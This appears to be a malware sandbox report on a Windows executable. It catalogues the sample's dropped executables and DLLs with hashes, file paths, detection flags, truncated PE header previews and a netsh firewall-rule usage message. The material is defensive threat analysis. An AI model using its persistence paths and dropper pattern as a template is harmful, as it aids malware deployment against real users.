SHA1:06ED392BC29AD9D5FC05EE254C2625FD65925114
SHA-256:25A4DAE37120426AB060EBB39B7030B3E7C1093CC34B0877F223B6843B651871
SHA-512:3DD4A86F83465989B2B30C240A7307EDD1B92D5C1D5C57D47EFF287DC9DAA7BACE157017908D82E00BE90F08FF5BADB68019FFC9D881440229DCEA5038F61CD6
Malicious:false
Reputation:unknown
C:\Users\user\AppData\LocalLow\sG8rM8v\ucrtbase.dll
Process:C:\Users\user\AppData\Local\Temp\7801.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1142072
Entropy (8bit):6.809041027525523
Encrypted:false
SSDEEP:24576:bZBmnrh2YVAPROs7Bt/tX+/APcmcvIZPoy4TbK:FBmF2lIeaAPgb
MD5:D6326267AE77655F312D2287903DB4D3
SHA1:1268BEF8E2CA6EBC5FB974FDFAFF13BE5BA7574F
SHA-256:0BB8C77DE80ACF9C43DE59A8FD75E611CC3EB8200C69F11E94389E8AF2CEB7A9
SHA-512:11DB71D286E9DF01CB05ACEF0E639C307EFA3FEF8442E5A762407101640AC95F20BAD58F0A21A4DF7DBCDA268F934B996D9906434BF7E575C4382281028F64D4
Malicious:false
Reputation:unknown
C:\Users\user\AppData\LocalLow\sG8rM8v\vcruntime140.dll
Process:C:\Users\user\AppData\Local\Temp\7801.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):83784
Entropy (8bit):6.890347360270656
Encrypted:false
SSDEEP:1536:AQXQNgAuCDeHFtg3uYQkDqiVsv39niI35kU2yecbVKHHwhbfugbZyk:AQXQNVDeHFtO5d/A39ie6yecbVKHHwJF
MD5:7587BF9CB4147022CD5681B015183046
SHA1:F2106306A8F6F0DA5AFB7FC765CFA0757AD5A628
SHA-256:C40BB03199A2054DABFC7A8E01D6098E91DE7193619EFFBD0F142A7BF031C14D
SHA-512:0B63E4979846CEBA1B1ED8470432EA6AA18CCA66B5F5322D17B14BC0DFA4B2EE09CA300A016E16A01DB5123E4E022820698F46D9BAD1078BD24675B4B181E91F
Malicious:false
Reputation:unknown
C:\Users\user\AppData\LocalLow\sqlite3.dll
Process:C:\Users\user\AppData\Local\Temp\7801.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):916735
Entropy (8bit):6.514932604208782
Encrypted:false
SSDEEP:24576:BJDwWdxW2SBNTjlY24eJoyGttl3+FZVpsq/2W:BJDvx0BY24eJoyctl3+FTX
MD5:F964811B68F9F1487C2B41E1AEF576CE
SHA1:B423959793F14B1416BC3B7051BED58A1034025F
SHA-256:83BC57DCF282264F2B00C21CE0339EAC20FCB7401F7C5472C0CD0C014844E5F7
SHA-512:565B1A7291C6FCB63205907FCD9E72FC2E11CA945AFC4468C378EDBA882E2F314C2AC21A7263880FF7D4B84C2A1678024C1AC9971AC1C1DE2BFA4248EC0F98C4
Malicious:false
Reputation:unknown
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\8EC4.exe.log
Process:C:\Users\user\AppData\Local\Temp\8EC4.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):700
Entropy (8bit):5.346524082657112
Encrypted:false
SSDEEP:12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhat/DLI4M/DLI4M0kvoDLIw:ML9E4Ks2wKDE4KhK3VZ9pKhgLE4qE4jv
MD5:65CF801545098D915A06D8318D296A01
SHA1:456149D5142C75C4CF74D4A11FF400F68315EBD0
SHA-256:32E502D76DBE4F89AEE586A740F8D1CBC112AA4A14D43B9914C785550CCA130F
SHA-512:4D1FF469B62EB5C917053418745CCE4280052BAEF9371CAFA5DA13140A16A7DE949DD1581395FF838A790FFEBF85C6FC969A93CC5FF2EEAB8C6C4A9B4F1D552D
Malicious:true
Reputation:unknown
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Dynamic, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
C:\Users\user\AppData\Local\Temp\7801.exe
Process:C:\Windows\explorer.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):905216
Entropy (8bit):7.399713113456654
Encrypted:false
SSDEEP:12288:KoXpNqySLyUDd48BpBIfj2ucA0ZeEbVkw+lMbguodE1z0oLxCZJ9tzj8kpcunn:KoO9FDZpBIMR/4Mzv2Jnp
MD5:852D86F5BC34BF4AF7FA89C60569DF13
SHA1:C961CCD088A7D928613B6DF900814789694BE0AE
SHA-256:2EAA2A4D6C975C73DCBF251EA9343C4E76BDEE4C5DDA8D4C7074078BE4D7FC6F
SHA-512:B66B83D619A242561B2A7A7364428A554BB72CCC64C3AC3F28FC7C73EFE95C7F9F3AC0401116AE6F7B41B960C323CC3B7ADAC782450013129D9DEC49A81DCEC7
Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\7CA1.exe
                                                                                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):327680
                                                                                                                                                                                                        Entropy (8bit):5.555665914483739
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:QOWFvVSz4X34ToHWGPOeh20XTF2xi69YPUy0ZPv4J3vfrhVggjcGkNIVqI:QO0sMITBsh20XTIp6M5Pv4tX7ITsq
                                                                                                                                                                                                        MD5:3754DB9964B0177B6E905999B6F18FD7
                                                                                                                                                                                                        SHA1:F47B3FCF01C76AF3B174792519D44171413D25AE
                                                                                                                                                                                                        SHA-256:F56B4C870E0B40ED1BF4F1019346F14443BBE8608D6F75ACB92B176D138F74B7
                                                                                                                                                                                                        SHA-512:8BF6439AD6FDC8A8F48F4520FB33A4D69E014BFB70EE3E691DBC611ACA11F1FE2C4B0D3901176455E6D46B8AA661B21C93069E0ABAF78DC93284935E866B29FA
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%l,9a.Bja.Bja.Bj._.j|.Bj._.j..Bj._.jO.BjF.9jb.Bja.Cj..Bj._.j`.Bj._.j`.Bj._.j`.BjRicha.Bj................PE..L....,._................. ...\......`3.......0....@.................................w...........................................(....................................1...............................s..@............0...............................text............ .................. ..`.rdata..nY...0...Z...$..............@..@.data................~..............@....rsrc................"..............@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\86C4.exe
                                                                                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):313344
                                                                                                                                                                                                        Entropy (8bit):5.391612297954252
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:3UXmSAohOX34vYHW6gl/rdGolEt1KBCLZISE8LqVpqVggjcGkNIVqI:3UWkWIvxNNkwEt1z9LoS7ITsq
                                                                                                                                                                                                        MD5:B11C5DEFDBA76C2B3EE67EE1B474389D
                                                                                                                                                                                                        SHA1:CCFA42FFB4378AFD337C14514B3EEA9BCF3FC03D
                                                                                                                                                                                                        SHA-256:6380B2CE70ACCB02DE54067A3CDFF27D87E2FAD23F36870C8F90E825E0AE8F2B
                                                                                                                                                                                                        SHA-512:D6683BC03CBF250D17D7BCE5AF562C9D94007669C2321037E644447FE5885B18461BEEAE4B8E848DEBB8DC70B1921A229CDE550ED566D0E13581DCEF2A6B65FB
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%l,9a.Bja.Bja.Bj._.j|.Bj._.j..Bj._.jO.BjF.9jb.Bja.Cj..Bj._.j`.Bj._.j`.Bj._.j`.BjRicha.Bj................PE..L....._................. ..."......`3.......0....@..........................@.......7..........................................(....`...............................1...............................s..@............0...............................text............ .................. ..`.rdata..nY...0...Z...$..............@..@.data...x........l...~..............@....rsrc........`......................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\8EC4.exe
                                                                                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                        Size (bytes):537088
                                                                                                                                                                                                        Entropy (8bit):5.840438491186833
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12288:SV2DJxKmQESnLJYydpKDDCrqXSIXcZD0sgbxRo:nK1vVYcZyXSY
                                                                                                                                                                                                        MD5:D7DF01D8158BFADDC8BA48390E52F355
                                                                                                                                                                                                        SHA1:7B885368AA9459CE6E88D70F48C2225352FAB6EF
                                                                                                                                                                                                        SHA-256:4F4D1A2479BA99627B5C2BC648D91F412A7DDDDF4BCA9688C67685C5A8A7078E
                                                                                                                                                                                                        SHA-512:63F1C903FB868E25CE49D070F02345E1884F06EDEC20C9F8A47158ECB70B9E93AAD47C279A423DB1189C06044EA261446CAE4DB3975075759052D264B020262A
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?y*...............0..*...........I... ...`....@.. ....................................@.................................`I..K....`............................................................................... ............... ..H............text....)... ...*.................. ..`.rsrc........`.......,..............@....reloc...............0..............@..B.................I......H............?..........hX..}............................................(....*..0..,.......(d...8....*.~....u....s....z&8.........8........................*.......*....(d...(....*...j*.......*.......*.......*.......*....(....*.~(....(^...8....*(.........8........*.......*.......*.......*.......*....0.............*.0.............*....*.......*.......*....(....*..0.............*....*....0.............*.(....z.A.........z.A.......................*.......*.......*.......*.......
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\8ED5.exe
                                                                                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):373760
                                                                                                                                                                                                        Entropy (8bit):6.990411328206368
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:GszrgLWpo6b1OmohXrIdF5SpBLE4Hy+74YOAnF3YFUGFHWEZq:Gsgq3b1Omsb7pBLEazsYOSGFHFHW
                                                                                                                                                                                                        MD5:8B239554FE346656C8EEF9484CE8092F
                                                                                                                                                                                                        SHA1:D6A96BE7A61328D7C25D7585807213DD24E0694C
                                                                                                                                                                                                        SHA-256:F96FB1160AAAA0B073EF0CDB061C85C7FAF4EFE018B18BE19D21228C7455E489
                                                                                                                                                                                                        SHA-512:CE9945E2AF46CCD94C99C36360E594FF5048FE8E146210CF8BA0D71C34CC3382B0AA252A96646BBFD57A22E7A72E9B917E457B176BCA2B12CC4F662D8430427D
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......l..U(...(...(...6.).1...6.?.W....l..+...(.......6.8.....6.(.)...6.-.)...Rich(...........PE..L...a.R`.....................v......@.............@..................................&..........................................(........{...................0..........................................@...............8............................text............................... ..`.data...............................@....gizi...............................@....bur................................@....wob................................@....rsrc....{.......|..................@..@.reloc..4F...0...H...l..............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\9A02.exe
                                                                                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):356864
                                                                                                                                                                                                        Entropy (8bit):7.848593493266229
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:v5aWbksiNTBiNg5/dEQECtD2YajndnU4aomwStqUJE0ra7yswH:v5atNTMNg5eQX2BdUcDStq+J4bwH
                                                                                                                                                                                                        MD5:6E7430832C1C24C2BF8BE746F2FE583C
                                                                                                                                                                                                        SHA1:158936951114B6A76D665935AD34F6581556FCDF
                                                                                                                                                                                                        SHA-256:972D533E4DF0786799C0E7C914AA6C04870753C10757C5D58CD874B92A7F4739
                                                                                                                                                                                                        SHA-512:79289323C1104F7483FAC9BF2BCAB5B3804C8F2315C8EDEA9D7C83C8B68B64473122F9B38627169D64A35A960A5F74A3364159CA9CB37B0A2B1BA1B41607A8C8
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....usZ...............2.....\...............0....@.........................................................................lq......................................................................................pt..<............................code...~8.......:.................. ..`.text...B....P.......>.............. ..`.rdata...3...0...4..................@..@.data........p.......J..............@....rsrc................\..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\ACEF.exe
                                                                                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3570176
                                                                                                                                                                                                        Entropy (8bit):7.997630766149595
                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                        SSDEEP:98304:Eyu1PF0IdV1/b4gfya9kofb/4rosp08oUPQH:EjtFp/tfyOTQrosGrUP0
                                                                                                                                                                                                        MD5:DDC599DB99362A7D8642FC19ABE03871
                                                                                                                                                                                                        SHA1:11199134356D8DE145D2EE22AAC37CA8AABA8A0B
                                                                                                                                                                                                        SHA-256:5D94F66FD3315E847213E16E19DFEB008B020798CFFF1334D48AC3344B711F22
                                                                                                                                                                                                        SHA-512:E35DBE56828E804AA78FE436E1717C3A09C416DBE2873FFFC9B44393E7EC2336CE9C544E4D6011C58E7E706819AEABC027AF9A85AA2A2509BDFC39699560ABFD
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....O.a.................$...................@....@.......................... T.....b.6.....................................|lO. .....M...................................................................................................................... ..........................@................0......................@...........&....@......................@................0......................@............1...P......................@............02......./.................@....rsrc.........M......40.............@....T3QbYgM.....`O.......1.............@....adata........T......z6.............@...........................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\B58B.exe
Process: C:\Windows\explorer.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 905216
Entropy (8bit): 7.399713113456654
Encrypted: false
SSDEEP: 12288:KoXpNqySLyUDd48BpBIfj2ucA0ZeEbVkw+lMbguodE1z0oLxCZJ9tzj8kpcunn:KoO9FDZpBIMR/4Mzv2Jnp
MD5: 852D86F5BC34BF4AF7FA89C60569DF13
SHA1: C961CCD088A7D928613B6DF900814789694BE0AE
SHA-256: 2EAA2A4D6C975C73DCBF251EA9343C4E76BDEE4C5DDA8D4C7074078BE4D7FC6F
SHA-512: B66B83D619A242561B2A7A7364428A554BB72CCC64C3AC3F28FC7C73EFE95C7F9F3AC0401116AE6F7B41B960C323CC3B7ADAC782450013129D9DEC49A81DCEC7
Malicious: false
Reputation: unknown
C:\Users\user\AppData\Local\Temp\BEB3.exe
Process: C:\Windows\explorer.exe
File Type: MS-DOS executable
Category: dropped
Size (bytes): 557664
Entropy (8bit): 7.687250283474463
Encrypted: false
SSDEEP: 12288:fWxcQhhhhhn8bieAtJlllLtrHWnjkQrK8iBHZkshvesxViA9Og+:fWZhhhhhUATlLtrUbK8oZphveoMA9
MD5: 6ADB5470086099B9169109333FADAB86
SHA1: 87EB7A01E9E54E0A308F8D5EDFD3AF6EBA4DC619
SHA-256: B4298F77E454BD5F0BD58913F95CE2D2AF8653F3253E22D944B20758BBC944B4
SHA-512: D050466BE53C33DAAF1E30CD50D7205F50C1ACA7BA13160B565CF79E1466A85F307FE1EC05DD09F59407FCB74E3375E8EE706ACDA6906E52DE6F2DD5FA3EDDCD
Malicious: false
Reputation: unknown
C:\Users\user\AppData\Local\Temp\CC60.exe
Process: C:\Windows\explorer.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 354816
Entropy (8bit): 7.859676161369944
Encrypted: false
SSDEEP: 6144:ezBkLL2NTBY2j1gmB0cR8zGnIu4TBJCb2WefmJwJS6jbMXC3DvMk7y:eKyNTa25ccRPIu49JmYt3jbM/
MD5: DF7952A5FC82DFB2E49AE81B6A1BE135
SHA1: 4F3A8CD939FBE37426EFDA7C88FBD2E49D8F8986
SHA-256: F04B77C60C896B33ED8FE286DE3341FC3FFD0211A987435475DC7E9D0ABCB0CC
SHA-512: 96A495E5D30E66A236C0AEA19DAEDF95B31F254E457647B6553F2D6CAE117F0A6DA2468550333FBAE3FFA94D0960E2459D2259D3B4C2598EFE49FC03E6C36F1A
Malicious: false
Reputation: unknown
C:\Users\user\AppData\Local\Temp\D984.exe
Process: C:\Windows\explorer.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 301056
Entropy (8bit): 5.192330972647351
Encrypted: false
SSDEEP: 3072:4/ls8LAAkcooHqeUolNx8IA0ZU3D80T840yWrxpzbgqruJnfed:Ils8LA/oHbbLAGOfT8auzbgwuJG
MD5: 277680BD3182EB0940BC356FF4712BEF
SHA1: 5995AE9D0247036CC6D3EA741E7504C913F1FB76
SHA-256: F9F0AAF36F064CDFC25A12663FFA348EB6D923A153F08C7CA9052DCB184B3570
SHA-512: 0B777D45C50EAE00AD050D3B2A78FA60EB78FE837696A6562007ED628719784655BA13EDCBBEE953F7EEFADE49599EE6D3D23E1C585114D7AECDDDA9AD1D0ECB
Malicious: false
Reputation: unknown
C:\Users\user\AppData\Local\Temp\E666.exe
Process: C:\Windows\explorer.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 294400
Entropy (8bit): 5.164848187454738
Encrypted: false
SSDEEP: 3072:Uv7CHCUfMX34IHHW1UJNZoVkzUl1V9gALVggjcGkNIVqI:UvByIIIW1UJNZo/VV7ITsq
MD5: 8362E0F91AE3379C73422BBCA7BAC493
SHA1: EC761F77BBE9900AED7FFA0A9303DC6801A9EFFB
SHA-256: ADFEA20237BE615461C44FEA423D6043FC74BF1C5303EE33FCECD8ACD201291E
SHA-512: A509F836E79276E35EE721AEB596214550E410753A122CE254CB3943EDA371713A9FE597717471BC13D884B497D767C393715C4224777F725C4F3EBED9286CAB
Malicious: true
Reputation: unknown
C:\Users\user\AppData\Local\Temp\lagavljy.exe
Process: C:\Users\user\AppData\Local\Temp\86C4.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 10543104
Entropy (8bit): 6.35786276890293
Encrypted: false
SSDEEP: 49152:xLORQkvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvP:xLORQ
MD5: 7A36C0AD3083A1519CCE3A67BB377D18
SHA1: 60416774DCA16DAC538703FC0DBF17E9D5F284DA
SHA-256: B968714F907A742E784710A566FC7178C278C074CAA95C5405D40573F35DBEBC
SHA-512: D9ACD8081190D480227E1B61FD3C8D7AA85B687AE53AFC90E412CCA158368AC2FEDFE50F62BE25C893F90ED65AE4E22EAFEBBEE352A94680BC8EAC6548170776
Malicious: true
Reputation: unknown
C:\Users\user\AppData\Roaming\uufaeea
Process: C:\Windows\explorer.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 294400
Entropy (8bit): 5.164848187454738
Encrypted: false
SSDEEP: 3072:Uv7CHCUfMX34IHHW1UJNZoVkzUl1V9gALVggjcGkNIVqI:UvByIIIW1UJNZo/VV7ITsq
MD5: 8362E0F91AE3379C73422BBCA7BAC493
SHA1: EC761F77BBE9900AED7FFA0A9303DC6801A9EFFB
SHA-256: ADFEA20237BE615461C44FEA423D6043FC74BF1C5303EE33FCECD8ACD201291E
SHA-512: A509F836E79276E35EE721AEB596214550E410753A122CE254CB3943EDA371713A9FE597717471BC13D884B497D767C393715C4224777F725C4F3EBED9286CAB
Malicious: true
Reputation: unknown
C:\Users\user\AppData\Roaming\uufaeea:Zone.Identifier
Process: C:\Windows\explorer.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 26
Entropy (8bit): 3.95006375643621
Encrypted: false
SSDEEP: 3:ggPYV:rPYV
MD5: 187F488E27DB4AF347237FE461A079AD
SHA1: 6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256: 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512: 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious: true
Reputation: unknown
                                                                                                                                                                                                        Preview: [ZoneTransfer]....ZoneId=0
C:\Windows\SysWOW64\shayesoq\lagavljy.exe (copy)
Process:C:\Windows\SysWOW64\cmd.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):10543104
Entropy (8bit):6.35786276890293
Encrypted:false
SSDEEP:49152:xLORQkvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvP:xLORQ
MD5:7A36C0AD3083A1519CCE3A67BB377D18
SHA1:60416774DCA16DAC538703FC0DBF17E9D5F284DA
SHA-256:B968714F907A742E784710A566FC7178C278C074CAA95C5405D40573F35DBEBC
SHA-512:D9ACD8081190D480227E1B61FD3C8D7AA85B687AE53AFC90E412CCA158368AC2FEDFE50F62BE25C893F90ED65AE4E22EAFEBBEE352A94680BC8EAC6548170776
Malicious:true
Reputation:unknown
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%l,9a.Bja.Bja.Bj._.j|.Bj._.j..Bj._.jO.BjF.9jb.Bja.Cj..Bj._.j`.Bj._.j`.Bj._.j`.BjRicha.Bj................PE..L....._................. ..."......`3.......0....@..........................@.......7..........................................(....`...............................1...............................s..@............0...............................text............ .................. ..`.rdata..nY...0...Z...$..............@..@.data...x........l...~..............@....rsrc........`......................@..@........................................................................................................................................................................................................................................................................................................................................................................
C:\Windows\appcompat\Programs\Amcache.hve
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:MS Windows registry file, NT/2000 or above
Category:dropped
Size (bytes):1572864
Entropy (8bit):4.236050220640177
Encrypted:false
SSDEEP:12288:/+hTI+sxo6OWrn9KBr9JQM7W6EX4gsVhIrSXOMOEplI41x/s:GhTI+sxo6Oun9KtK6
MD5:3A981F75C79C87C66C2E3C993FB7A1C9
SHA1:E447E1AB82B13A9649001FA037AEDEA394BFFABF
SHA-256:83B31472AC406793A71F32EC8192392C190E17B1C2D7D34054D38BB83AE42926
SHA-512:555E753BD31D48649DF9BD994502ACEE6C1DF21BA8233A5474DA1705453C1C6974B9A09794C6E0ED3132DE8F630B82C5351A06A21EDFD16A1E1F1A28C87FC757
Malicious:false
Reputation:unknown
Preview: regfH...H...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm"{ho..................................................................................................................................................................................................................................................................................................................................................c2........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Windows\appcompat\Programs\Amcache.hve.LOG1
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:MS Windows registry file, NT/2000 or above
Category:dropped
Size (bytes):20480
Entropy (8bit):3.343015280987901
Encrypted:false
SSDEEP:384:fDe5K5pPmKgnVVeeDzeG1NKZtjeT8GVwD35N9M8B:bwKRg/eeDzeoNYtjrGVwDhM8
MD5:491C1A22271D000AADFD943296472D2C
SHA1:44B8CF79D15C31CFA752EB16907A33792133108C
SHA-256:42147A6458BEDAC8A7876F60936731C57A5FB75E195C6A26F5167036C944FC0C
SHA-512:6568F87D8F49E4AC276EBA782CCE0BE72A99345C65F0EEF985946346559FDBA5A2233BCE24F4898490DFFDD5C915A0E60E26BE8B25FF48B4F635E28521A5F409
Malicious:false
Reputation:unknown
Preview: regfG...G...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm"{ho..................................................................................................................................................................................................................................................................................................................................................c2HvLE.N......G...........p..dE.....O......................... ..hbin................p.\..,..........nk,...jo........ ........................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ...jo........ ........................... .......Z.......................Root........lf......Root....nk ...jo.................................... ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck.......p...
\Device\ConDrv
Process:C:\Windows\SysWOW64\netsh.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):3773
Entropy (8bit):4.7109073551842435
Encrypted:false
SSDEEP:48:VHILZNfrI7WFY32iIiNOmV/HToZV9It199hiALlIg39bWA1RvTBi/g2eB:VoLr0y9iIiNOoHTou7bhBlIydWALLt2w
MD5:DA3247A302D70819F10BCEEBAF400503
SHA1:2857AA198EE76C86FC929CC3388A56D5FD051844
SHA-256:5262E1EE394F329CD1F87EA31BA4A396C4A76EDC3A87612A179F81F21606ABC8
SHA-512:48FFEC059B4E88F21C2AA4049B7D9E303C0C93D1AD771E405827149EDDF986A72EF49C0F6D8B70F5839DCDBD6B1EA8125C8B300134B7F71C47702B577AD090F8
Malicious:false
Reputation:unknown
Preview: ..A specified value is not valid.....Usage: add rule name=<string>.. dir=in|out.. action=allow|block|bypass.. [program=<program path>].. [service=<service short name>|any].. [description=<string>].. [enable=yes|no (default=yes)].. [profile=public|private|domain|any[,...]].. [localip=any|<IPv4 address>|<IPv6 address>|<subnet>|<range>|<list>].. [remoteip=any|localsubnet|dns|dhcp|wins|defaultgateway|.. <IPv4 address>|<IPv6 address>|<subnet>|<range>|<list>].. [localport=0-65535|<port range>[,...]|RPC|RPC-EPMap|IPHTTPS|any (default=any)].. [remoteport=0-65535|<port range>[,...]|any (default=any)].. [protocol=0-255|icmpv4|icmpv6|icmpv4:type,code|icmpv6:type,code|.. tcp|udp|any (default=any)].. [interfacetype=wireless|lan|ras|any].. [rmtcomputergrp=<SDDL string>].. [rmtusrgrp=<SDDL string>].. [edge=yes|deferapp|deferuser|no (default=no)].. [security=authenticate|authenc|authdynenc|authnoencap|

Static File Info

General

File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):5.164848187454738
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:U3E7zMaux2.exe
File size:294400
MD5:8362e0f91ae3379c73422bbca7bac493
SHA1:ec761f77bbe9900aed7ffa0a9303dc6801a9effb
SHA256:adfea20237be615461c44fea423d6043fc74bf1c5303ee33fcecd8acd201291e
SHA512:a509f836e79276e35ee721aeb596214550e410753a122ce254cb3943eda371713a9fe597717471bc13d884b497d767c393715c4224777f725c4f3ebed9286cab
SSDEEP:3072:Uv7CHCUfMX34IHHW1UJNZoVkzUl1V9gALVggjcGkNIVqI:UvByIIIW1UJNZo/VV7ITsq
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%l,9a.Bja.Bja.Bj._.j|.Bj._.j..Bj._.jO.BjF.9jb.Bja.Cj..Bj._.j`.Bj._.j`.Bj._.j`.BjRicha.Bj................PE..L......`...........

File Icon

Icon Hash:acec36b6b694c6e2

Static PE Info

General

Entrypoint:0x403360
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
